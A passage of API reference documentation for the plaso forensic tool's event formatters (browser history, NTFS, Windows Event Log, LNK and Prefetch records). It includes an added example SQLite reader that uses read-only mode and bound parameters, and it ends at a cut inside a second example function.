GetScanObject(path_segment) Retrieves the scan object for a specific path segment.
Parameters path_segment (str) – path segment.
Returns
a scan object, which is either a scan tree sub node, a path or the default value.
Return type str|PathFilterScanTreeNode
SetDefaultValue(scan_object) Sets the default (non-match) value.
Parameters scan_object (str|PathFilterScanTreeNode) – a scan object, which is either a scan tree sub node or a path.
Raises
• TypeError – if the scan object is of an unsupported type.
• ValueError – if the default value is already set.
ToDebugString(indentation_level=1) Converts the path filter scan tree node into a debug string.
Parameters indentation_level (int) – text indentation level.
Returns debug string representing the path filter scan tree node.
Return type str
property path_segments path segments.
Type list[str]
Module contents
5.1.7 plaso.formatters package
Submodules
plaso.formatters.asl module
The Apple System Log (ASL) event formatter.
class plaso.formatters.asl.ASLFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
Formatter for an Apple System Log (ASL) log event.
DATA_TYPE = 'mac:asl:event'
FORMAT_STRING_PIECES = ['MessageID: {message_id}', 'Level: {level}', 'User ID: {user_sid}', 'Group ID: {group_id}', 'Read User: {read_uid}', 'Read Group: {read_gid}', 'Host: {computer_name}', 'Sender: {sender}', 'Facility: {facility}', 'Message: {message}', '{extra_information}']
FORMAT_STRING_SHORT_PIECES = ['Host: {host}', 'Sender: {sender}', 'Facility: {facility}']
GetMessages(formatter_mediator, event_data) Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
plaso.formatters.chrome module
The Google Chrome history event formatters.
class plaso.formatters.chrome.ChromePageVisitedFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
Formatter for a Chrome page visited event.
DATA_TYPE = 'chrome:history:page_visited'
FORMAT_STRING_PIECES = ['{url}', '({title})', '[count: {typed_count}]', 'Visit from: {from_visit}', 'Visit Source: [{visit_source}]', 'Type: [{page_transition}]', '{extra}']
FORMAT_STRING_SHORT_PIECES = ['{url}', '({title})']
GetMessages(formatter_mediator, event_data) Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
plaso.formatters.chrome_preferences module
The Google Chrome Preferences file event formatter.
class plaso.formatters.chrome_preferences.ChromeContentSettingsExceptionsFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
Formatter for a Chrome content_settings exceptions event.
DATA_TYPE = 'chrome:preferences:content_settings:exceptions'
FORMAT_STRING_PIECES = ['Permission {permission}', 'used by {subject}']
FORMAT_STRING_SHORT_PIECES = ['Permission {permission}', 'used by {subject}']
GetMessages(formatter_mediator, event_data) Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
plaso.formatters.default module
The default event formatter.
class plaso.formatters.default.DefaultFormatter
Bases: plaso.formatters.interface.EventFormatter
Formatter for events that do not have any defined formatter.
DATA_TYPE = 'event'
FORMAT_STRING = '<WARNING DEFAULT FORMATTER> Attributes: {attribute_driven}'
FORMAT_STRING_SHORT = '<DEFAULT> {attribute_driven}'
GetMessages(formatter_mediator, event_data) Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
plaso.formatters.file_system module
The file system stat event formatter.
class plaso.formatters.file_system.FileStatEventFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
The file system stat event formatter.
DATA_TYPE = 'fs:stat'
FORMAT_STRING_PIECES = ['{display_name}', 'Type: {file_entry_type}', '({unallocated})']
FORMAT_STRING_SHORT_PIECES = ['(unknown)']
GetMessages(formatter_mediator, event_data) Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
class plaso.formatters.file_system.NTFSFileStatEventFormatter
Bases: plaso.formatters.file_system.FileStatEventFormatter
The NTFS file system stat event formatter.
DATA_TYPE = 'fs:stat:ntfs'
FORMAT_STRING_PIECES = ['{display_name}', 'File reference: {file_reference}', 'Attribute name: {attribute_name}', 'Name: {name}', 'Parent file reference: {parent_file_reference}', '({unallocated})', 'Path hints: {path_hints}']
FORMAT_STRING_SHORT_PIECES = ['(unknown)', '{file_reference}', '{attribute_name}']
GetMessages(formatter_mediator, event_data) Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
class plaso.formatters.file_system.NTFSUSNChangeEventFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
The NTFS USN change event formatter.
DATA_TYPE = 'fs:ntfs:usn_change'
FORMAT_STRING_PIECES = ['(unknown)', 'File reference: {file_reference}', 'Parent file reference: {parent_file_reference}', 'Update source: {update_source}', 'Update reason: {update_reason}']
FORMAT_STRING_SHORT_PIECES = ['(unknown)', '{file_reference}', '{update_reason}']
GetMessages(formatter_mediator, event_data) Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
plaso.formatters.firefox module
The Mozilla Firefox history event formatter.
class plaso.formatters.firefox.FirefoxPageVisitFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
The Firefox page visited event formatter.
DATA_TYPE = 'firefox:places:page_visited'
FORMAT_STRING_PIECES = ['{url}', '({title})', '[count: {visit_count}]', 'Host: {host}', '{extra_string}']
FORMAT_STRING_SHORT_PIECES = ['URL: {url}']
GetMessages(formatter_mediator, event_data) Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
plaso.formatters.gdrive module
The Google Drive snapshots event formatter.
class plaso.formatters.gdrive.GDriveCloudEntryFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
Formatter for a Google Drive snapshot cloud event.
DATA_TYPE = 'gdrive:snapshot:cloud_entry'
FORMAT_STRING_PIECES = ['File Path: {path}', '[{shared}]', 'Size: {size}', 'URL: {url}', 'Type: {document_type}']
FORMAT_STRING_SHORT_PIECES = ['{path}']
GetMessages(formatter_mediator, event_data) Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
plaso.formatters.interface module
This file contains the event formatters interface classes.
The l2t_csv and other formats are dependent on a message field, referred to as description_long and description_short in l2t_csv.
Plaso no longer stores these field explicitly.
A formatter, with a format string definition, is used to convert the event object values into a formatted string that is similar to the description_long and description_short field.
class plaso.formatters.interface.ConditionalEventFormatter
Bases: plaso.formatters.interface.EventFormatter
Base class to conditionally format event data using format string pieces.
Define the (long) format string and the short format string by defining FORMAT_STRING_PIECES and FORMAT_STRING_SHORT_PIECES. The syntax of the format string pieces is similar to that of the event formatter (EventFormatter). Every format string piece should contain a single attribute name or none.
FORMAT_STRING_SEPARATOR is used to control the string with which the separate string pieces are joined. It contains a space by default.
FORMAT_STRING_PIECES = ['']
FORMAT_STRING_SEPARATOR = ' '
FORMAT_STRING_SHORT_PIECES = ['']
GetFormatStringAttributeNames() Retrieves the attribute names in the format string.
Returns attribute names.
Return type set(str)
GetMessages(formatter_mediator, event_data) Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises
• RuntimeError – when an invalid format string piece is encountered.
• WrongFormatter – if the event data cannot be formatted by the formatter.
class plaso.formatters.interface.EnumerationEventFormatterHelper(default=None, input_attribute=None, output_attribute=None, values=None)
Bases: object
Helper for formatting enumeration event data.
default default value.
Type str
input_attribute name of the attribute that contains the enumeration input value.
Type str
output_attribute name of the attribute where the enumeration output value should be stored.
Type str
values mapping of enumeration input and output values.
Type dict[str, str]
FormatEventValues(event_values) Formats event values using the helper.
Parameters event_values (dict[str, object]) – event values.
class plaso.formatters.interface.EventFormatter
Bases: object
Base class to format event data using a format string.
Define the (long) format string and the short format string by defining FORMAT_STRING and FORMAT_STRING_SHORT. The syntax of the format strings is similar to that of format() where the place holder for a certain event object attribute is defined as {attribute_name}.
helpers event formatter helpers.
Type list[EventFormatterHelper]
AddHelper(helper) Adds an event formatter helper.
Parameters helper (EventFormatterHelper) – event formatter helper to add.
DATA_TYPE = 'internal'
FORMAT_STRING = ''
FORMAT_STRING_SHORT = ''
GetFormatStringAttributeNames() Retrieves the attribute names in the format string.
Returns attribute names.
Return type set(str)
GetMessages(formatter_mediator, event_data) Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
SOURCE_LONG = ''
SOURCE_SHORT = 'LOG'
class plaso.formatters.interface.EventFormatterHelper
Bases: object
Base class of helper for formatting event data.
abstract FormatEventValues(event_values) Formats event values using the helper.
Parameters event_values (dict[str, object]) – event values.
class plaso.formatters.interface.FlagsEventFormatterHelper(input_attribute=None, output_attribute=None, values=None)
Bases: object
Helper for formatting flags event data.
input_attribute name of the attribute that contains the flags input value.
Type str
output_attribute name of the attribute where the flags output value should be stored.
Type str
values mapping of flags input and output values.
Type dict[str, str]
FormatEventValues(event_values) Formats event values using the helper.
Parameters event_values (dict[str, object]) – event values.
plaso.formatters.logger module
The formatters sub module logger.
plaso.formatters.manager module
This file contains the event formatters manager class.
class plaso.formatters.manager.FormattersManager
Bases: object
Class that implements the formatters manager.
classmethod DeregisterFormatter(formatter_class) Deregisters a formatter class.
The formatter classes are identified based on their lower case data type.
Parameters formatter_class (type) – class of the formatter.
Raises KeyError – if formatter class is not set for the corresponding data type.
classmethod GetFormatterObject(data_type) Retrieves the formatter object for a specific data type.
Parameters data_type (str) – data type.
Returns
corresponding formatter or the default formatter if not available.
Return type EventFormatter
classmethod GetMessageStrings(formatter_mediator, event_data) Retrieves the formatted message strings for a specific event.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns long and short version of the message string.
Return type list[str, str]
classmethod GetUnformattedAttributes(event_data) Retrieves names of the event data attributes that are not formatted.
Parameters event_data (EventData) – event data.
Returns names of the event data attributes that are not formatted.
Return type list[str]
classmethod ReadFormattersFromDirectory(path) Reads formatters from a directory.
Parameters path (str) – path of directory that contains the formatters configuration files.
Raises KeyError – if formatter class is already set for the corresponding data type.
classmethod ReadFormattersFromFile(path) Reads formatters from a file.
Parameters path (str) – path of file that contains the formatters configuration.
Raises KeyError – if formatter class is already set for the corresponding data type.
classmethod RegisterFormatter(formatter_class) Registers a formatter class.
The formatter classes are identified based on their lower case data type.
Parameters formatter_class (type) – class of the formatter.
Raises KeyError – if formatter class is already set for the corresponding data type.
classmethod RegisterFormatters(formatter_classes) Registers formatter classes.
The formatter classes are identified based on their lower case data type.
Parameters formatter_classes (list[type]) – classes of the formatters.
Raises KeyError – if formatter class is already set for the corresponding data type.
classmethod Reset() Resets the manager to the hardcoded formatter classes.
This method is used during unit testing.
plaso.formatters.mediator module
The formatter mediator object.
class plaso.formatters.mediator.FormatterMediator(data_location=None)
Bases: object
Class that implements the formatter mediator.
DEFAULT_LANGUAGE_IDENTIFIER = 'en-US'
DEFAULT_LCID = 1033
GetWindowsEventMessage(log_source, message_identifier) Retrieves the message string for a specific Windows Event Log source.
Parameters
• log_source (str) – Event Log source, such as “Application Error”.
• message_identifier (int) – message identifier.
Returns message string or None if not available.
Return type str
SetPreferredLanguageIdentifier(language_identifier) Sets the preferred language identifier.
Parameters language_identifier (str) – language identifier string such as “en-US” for US English or “is-IS” for Icelandic.
Raises
• KeyError – if the language identifier is not defined.
• ValueError – if the language identifier is not a string type.
property lcid preferred Language Code identifier (LCID).
Type int
plaso.formatters.msiecf module
The Microsoft Internet Explorer (MSIE) Cache Files (CF) event formatters.
class plaso.formatters.msiecf.MsiecfItemFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
Formatter for a MSIECF item event.
GetMessages(formatter_mediator, event_data) Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
class plaso.formatters.msiecf.MsiecfLeakFormatterBases: plaso.formatters.msiecf.MsiecfItemFormatter
Formatter for a MSIECF leak item event.
DATA_TYPE = 'msiecf:leak'
FORMAT_STRING_PIECES = ['Cached file: {cached_file_path}', 'Cached file size: {cached_file_size}', '{recovered_string}']
FORMAT_STRING_SHORT_PIECES = ['Cached file: {cached_file_path}']
class plaso.formatters.msiecf.MsiecfRedirectedFormatterBases: plaso.formatters.msiecf.MsiecfItemFormatter
Formatter for a MSIECF leak redirected event.
DATA_TYPE = 'msiecf:redirected'
FORMAT_STRING_PIECES = ['Location: {url}', '{recovered_string}']
FORMAT_STRING_SHORT_PIECES = ['Location: {url}']
class plaso.formatters.msiecf.MsiecfUrlFormatterBases: plaso.formatters.msiecf.MsiecfItemFormatter
Formatter for a MSIECF URL item event.
DATA_TYPE = 'msiecf:url'
FORMAT_STRING_PIECES = ['Location: {url}', 'Number of hits: {number_of_hits}', 'Cached file: {cached_file_path}', 'Cached file size: {cached_file_size}', 'HTTP headers: {http_headers}', '{recovered_string}']
FORMAT_STRING_SHORT_PIECES = ['Location: {url}', 'Cached file: {cached_file_path}']
plaso.formatters.olecf module
The OLE Compound File (OLECF) event formatters.
class plaso.formatters.olecf.OLECFSummaryInfoFormatterBases: plaso.formatters.interface.ConditionalEventFormatter
Formatter for an OLECF Summary Info property set stream event.
DATA_TYPE = 'olecf:summary_info'
FORMAT_STRING_PIECES = ['Title: {title}', 'Subject: {subject}', 'Author: {author}', 'Keywords: {keywords}', 'Comments: {comments}', 'Template: {template}', 'Revision number: {revision_number}', 'Last saved by: {last_saved_by}', 'Total edit time: {total_edit_time}', 'Number of pages: {number_of_pages}', 'Number of words: {number_of_words}', 'Number of characters: {number_of_characters}', 'Application: {application}', 'Security: {security}']
FORMAT_STRING_SHORT_PIECES = ['Title: {title}', 'Subject: {subject}', 'Author: {author}', 'Revision number: {revision_number}']
GetMessages(formatter_mediator, event_data)
Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
plaso.formatters.safari_cookies module
The Safari Binary cookie event formatter.
class plaso.formatters.safari_cookies.SafariCookieFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
Formatter for a Safari Binary Cookie file entry event.
DATA_TYPE = 'safari:cookie:entry'
FORMAT_STRING_PIECES = ['{url}', '<{path}>', '({cookie_name})', 'Flags: {flags}']
FORMAT_STRING_SHORT_PIECES = ['{url}', '({cookie_name})']
GetMessages(formatter_mediator, event_data)
Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
plaso.formatters.shell_items module
The shell item event formatter.
class plaso.formatters.shell_items.ShellItemFileEntryEventFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
Formatter for a shell item file entry event.
DATA_TYPE = 'windows:shell_item:file_entry'
FORMAT_STRING_PIECES = ['Name: {name}', 'Long name: {long_name}', 'Localized name: {localized_name}', 'NTFS file reference: {file_reference}', 'Shell item path: {shell_item_path}', 'Origin: {origin}']
FORMAT_STRING_SHORT_PIECES = ['Name: {file_entry_name}', 'NTFS file reference: {file_reference}', 'Origin: {origin}']
GetMessages(formatter_mediator, event_data)
Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
plaso.formatters.tango_android module
Tango on Android databases formatter.
class plaso.formatters.tango_android.TangoAndroidContactFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
Tango on Android contact event formatter.
DATA_TYPE = 'tango:android:contact'
FORMAT_STRING_PIECES = ['{first_name}', '{last_name}', '{gender}', 'birthday: {birthday}', 'Status: {status}', 'Friend: {is_friend}', 'Request type: {friend_request_type}', 'Request message: {friend_request_message}']
FORMAT_STRING_SHORT_PIECES = ['{first_name}', '{last_name}', 'Status: {status}']
GetMessages(formatter_mediator, event_data)
Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
plaso.formatters.winevt module
The Windows EventLog (EVT) file event formatter.
class plaso.formatters.winevt.WinEVTFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
Formatter for a Windows EventLog (EVT) record event.
DATA_TYPE = 'windows:evt:record'
FORMAT_STRING_PIECES = ['[{event_identifier} /', '0x{event_identifier:04x}]', 'Source Name: {source_name}', 'Message string: {message_string}', 'Strings: {strings}', 'Computer Name: {computer_name}', 'Severity: {severity}', 'Record Number: {record_number}', 'Event Type: {event_type}', 'Event Category: {event_category}']
FORMAT_STRING_SHORT_PIECES = ['[{event_identifier} /', '0x{event_identifier:04x}]', 'Strings: {strings}']
GetEventTypeString(event_type)
Retrieves a string representation of the event type.
Parameters event_type (int) – event type.
Returns description of the event type.
Return type str
GetMessages(formatter_mediator, event_data)
Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
GetSeverityString(severity)
Retrieves a string representation of the severity.
Parameters severity (int) – severity.
Returns description of the event severity.
Return type str
plaso.formatters.winevt_rc module
Windows Event Log resources database reader.
class plaso.formatters.winevt_rc.Sqlite3DatabaseFile
Bases: object
Class that defines a sqlite3 database file.
Close()
Closes the database file.
Raises RuntimeError – if the database is not opened.
GetValues(table_names, column_names, condition)
Retrieves values from a table.
Parameters
• table_names (list[str]) – table names.
• column_names (list[str]) – column names.
• condition (str) – query condition such as “log_source == ‘Application Error’”.
Yields sqlite3.row – row.
Raises RuntimeError – if the database is not opened.
HasTable(table_name)
Determines if a specific table exists.
Parameters table_name (str) – table name.
Returns True if the table exists.
Return type bool
Raises RuntimeError – if the database is not opened.
Open(filename, read_only=False)
Opens the database file.
Parameters
• filename (str) – filename of the database.
• read_only (Optional[bool]) – True if the database should be opened in read-only mode. Since sqlite3 does not support a real read-only mode we fake it by only permitting SELECT queries.
Returns True if successful.
Return type bool
Raises RuntimeError – if the database is already opened.
class plaso.formatters.winevt_rc.Sqlite3DatabaseReader
Bases: object
Class to represent a sqlite3 database reader.
Close()
Closes the database reader object.
Open(filename)
Opens the database reader object.
Parameters filename (str) – filename of the database.
Returns True if successful.
Return type bool
class plaso.formatters.winevt_rc.WinevtResourcesSqlite3DatabaseReader
Bases: plaso.formatters.winevt_rc.Sqlite3DatabaseReader
Class to represent a sqlite3 Event Log resources database reader.
GetMessage(log_source, lcid, message_identifier)
Retrieves a specific message for a specific Event Log source.
Parameters
• log_source (str) – Event Log source.
• lcid (int) – language code identifier (LCID).
• message_identifier (int) – message identifier.
Returns message string or None if not available.
Return type str
GetMetadataAttribute(attribute_name)
Retrieves the metadata attribute.
Parameters attribute_name (str) – name of the metadata attribute.
Returns the metadata attribute or None.
Return type str
Raises RuntimeError – if more than one value is found in the database.
Open(filename)
Opens the database reader object.
Parameters filename (str) – filename of the database.
Returns True if successful.
Return type bool
Raises RuntimeError – if the version or string format of the database is not supported.
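The Open() docstring of Sqlite3DatabaseFile above notes that read-only mode is faked by permitting only SELECT queries, and GetValues() takes its condition as a raw SQL fragment. As an added example (written for this page, not plaso's winevt_rc code), the reader below instead opens the file with SQLite's own mode=ro URI option so the engine itself refuses writes, and binds the log source, LCID and message identifier as query parameters. The table layout and sample rows are constructed for the example and are not the layout of plaso's winevt-rc.db.

```python
import os
import pathlib
import sqlite3
import tempfile


class ReadOnlyMessageDatabase(object):
    """Opens a SQLite file in SQLite's own read-only mode; lookups use bound parameters."""

    def __init__(self):
        self._connection = None

    def open(self, filename):
        """Opens the database read-only; returns False if the file does not exist."""
        if self._connection is not None:
            raise RuntimeError('database is already opened')
        if not os.path.isfile(filename):
            return False
        # mode=ro lets the engine refuse every write, so no SQL screening is needed.
        uri = pathlib.Path(filename).resolve().as_uri() + '?mode=ro'
        self._connection = sqlite3.connect(uri, uri=True)
        return True

    def close(self):
        if self._connection is None:
            raise RuntimeError('database is not opened')
        self._connection.close()
        self._connection = None

    def has_table(self, table_name):
        """Determines if a table exists; the name is bound, not pasted into the SQL."""
        if self._connection is None:
            raise RuntimeError('database is not opened')
        cursor = self._connection.execute(
            'SELECT name FROM sqlite_master WHERE type = ? AND name = ?',
            ('table', table_name))
        return cursor.fetchone() is not None

    def get_message(self, log_source, lcid, message_identifier):
        """Returns the message string for (source, LCID, identifier) or None."""
        if self._connection is None:
            raise RuntimeError('database is not opened')
        cursor = self._connection.execute(
            'SELECT message_string FROM message_strings '
            'WHERE log_source = ? AND lcid = ? AND message_identifier = ?',
            (log_source, lcid, message_identifier))
        row = cursor.fetchone()
        return row[0] if row else None

    def try_delete_all(self):
        """Attempts a write; returns True when the read-only open refuses it."""
        try:
            self._connection.execute('DELETE FROM message_strings')
        except sqlite3.OperationalError:
            return True
        return False


def build_sample_database(path):
    """Creates the constructed sample database (layout invented for this example)."""
    connection = sqlite3.connect(path)
    connection.execute(
        'CREATE TABLE message_strings (log_source TEXT, lcid INTEGER, '
        'message_identifier INTEGER, message_string TEXT)')
    connection.executemany(
        'INSERT INTO message_strings VALUES (?, ?, ?, ?)', [
            ('Microsoft-Windows-Security-Auditing', 0x0409, 4624,
             'An account was successfully logged on.'),
            # A source name containing a quote is plain data when bound as a parameter.
            ("O'Brien Backup Agent", 0x0409, 100, 'Backup job completed.')])
    connection.commit()
    connection.close()


def demo():
    """Round trip on a temporary file; returns the lookup results and the write check."""
    path = os.path.join(tempfile.mkdtemp(), 'sample-winevt-rc.db')
    build_sample_database(path)
    database = ReadOnlyMessageDatabase()
    if not database.open(path):
        raise RuntimeError('could not open sample database')
    try:
        return {
            'has_table': database.has_table('message_strings'),
            'logon': database.get_message(
                'Microsoft-Windows-Security-Auditing', 0x0409, 4624),
            'quoted_source': database.get_message("O'Brien Backup Agent", 0x0409, 100),
            'missing': database.get_message(
                'Microsoft-Windows-Security-Auditing', 0x0409, 1),
            'write_refused': database.try_delete_all(),
        }
    finally:
        database.close()
```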
plaso.formatters.winevtx module
The Windows XML EventLog (EVTX) file event formatter.
class plaso.formatters.winevtx.WinEVTXFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
Formatter for a Windows XML EventLog (EVTX) record event.
DATA_TYPE = 'windows:evtx:record'
FORMAT_STRING_PIECES = ['[{event_identifier} /', '0x{event_identifier:04x}]', 'Source Name: {source_name}', 'Message string: {message_string}', 'Strings: {strings}', 'Computer Name: {computer_name}', 'Record Number: {record_number}', 'Event Level: {event_level}']
FORMAT_STRING_SHORT_PIECES = ['[{event_identifier} /', '0x{event_identifier:04x}]', 'Strings: {strings}']
GetMessages(formatter_mediator, event_data)
Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
plaso.formatters.winlnk module
The Windows Shortcut (LNK) event formatter.
class plaso.formatters.winlnk.WinLnkLinkFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
Formatter for a Windows Shortcut (LNK) link event.
DATA_TYPE = 'windows:lnk:link'
FORMAT_STRING_PIECES = ['[{description}]', 'File size: {file_size}', 'File attribute flags: 0x{file_attribute_flags:08x}', 'Drive type: {drive_type}', 'Drive serial number: 0x{drive_serial_number:08x}', 'Volume label: {volume_label}', 'Local path: {local_path}', 'Network path: {network_path}', 'cmd arguments: {command_line_arguments}', 'env location: {env_var_location}', 'Relative path: {relative_path}', 'Working dir: {working_directory}', 'Icon location: {icon_location}', 'Link target: {link_target}']
FORMAT_STRING_SHORT_PIECES = ['[{description}]', '{linked_path}', '{command_line_arguments}']
GetMessages(formatter_mediator, event_data)
Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
plaso.formatters.winprefetch module
The Windows Prefetch event formatter.
class plaso.formatters.winprefetch.WinPrefetchExecutionFormatter
Bases: plaso.formatters.interface.ConditionalEventFormatter
Formatter for a Windows Prefetch execution event.
DATA_TYPE = 'windows:prefetch:execution'
FORMAT_STRING_PIECES = ['Prefetch', '[{executable}] was executed -', 'run count {run_count}', 'path hints: {path_hints}', 'hash: 0x{prefetch_hash:08X}', '{volumes_string}']
FORMAT_STRING_SHORT_PIECES = ['{executable} was run', '{run_count} time(s)']
GetMessages(formatter_mediator, event_data)
Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
plaso.formatters.winreg module
The Windows Registry key or value event formatter.
class plaso.formatters.winreg.WinRegistryGenericFormatter
Bases: plaso.formatters.interface.EventFormatter
Formatter for a Windows Registry key or value event.
DATA_TYPE = 'windows:registry:key_value'
FORMAT_STRING = '[{key_path}] {values}'
FORMAT_STRING_ALTERNATIVE = '{values}'
GetMessages(formatter_mediator, event_data)
Determines the formatted message strings for the event data.
Parameters
• formatter_mediator (FormatterMediator) – mediates the interactions between formatters and other components, such as storage and Windows EventLog resources.
• event_data (EventData) – event data.
Returns formatted message string and short message string.
Return type tuple(str, str)
Raises WrongFormatter – if the event data cannot be formatted by the formatter.
plaso.formatters.yaml_formatters_file module
YAML-based formatters file.
class plaso.formatters.yaml_formatters_file.YAMLFormattersFile
Bases: object
YAML-based formatters file.
A YAML-based formatters file contains one or more event formatters, for example:
type: 'conditional'
data_type: 'fs:stat'
message:
- '{display_name}'
- 'Type: {file_entry_type}'
- '({unallocated})'
short_message:
- '(unknown)'
Where:
• type, defines the formatter data type, which can be "basic" or "conditional";
• data_type, defines the corresponding event data type;
• message, defines a list of message string pieces;
• separator, defines the message and short message string pieces separator;
• short_message, defines the short message string pieces;
ReadFromFile(path)
Reads the event formatters from the YAML-based formatters file.
Parameters path (str) – path to a formatters file.
Returns event formatters.
Return type list[EventFormatter]
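As an added illustration of how message pieces are combined (example code written for this page, not plaso's ConditionalEventFormatter), the function below renders the message and short message of the fs:stat definition above and of a definition constructed to mirror the leading FORMAT_STRING_PIECES of the EVT/EVTX record formatters earlier in this section. It models the documented behaviour: a piece is kept only when every attribute it references is present in the event data, and the kept pieces are joined with the separator. Plain dicts stand in for the parsed YAML so no YAML library is needed.

```python
import string

# Constructed stand-ins for parsed formatter definitions (no YAML library needed).
FS_STAT_FORMATTER = {
    'type': 'conditional',
    'data_type': 'fs:stat',
    'message': ['{display_name}', 'Type: {file_entry_type}', '({unallocated})'],
    'short_message': ['(unknown)'],
}

# Mirrors the leading FORMAT_STRING_PIECES of the EVT/EVTX record formatters.
EVT_RECORD_FORMATTER = {
    'type': 'conditional',
    'data_type': 'windows:evt:record',
    'message': ['[{event_identifier} /', '0x{event_identifier:04x}]',
                'Source Name: {source_name}', 'Strings: {strings}'],
    'short_message': ['[{event_identifier} /', '0x{event_identifier:04x}]',
                      'Strings: {strings}'],
}


def placeholders(piece):
    """Returns the attribute names a piece references, e.g. 'Type: {x}' -> ['x']."""
    return [name for _, name, _, _ in string.Formatter().parse(piece) if name]


def format_conditional(definition, event_data):
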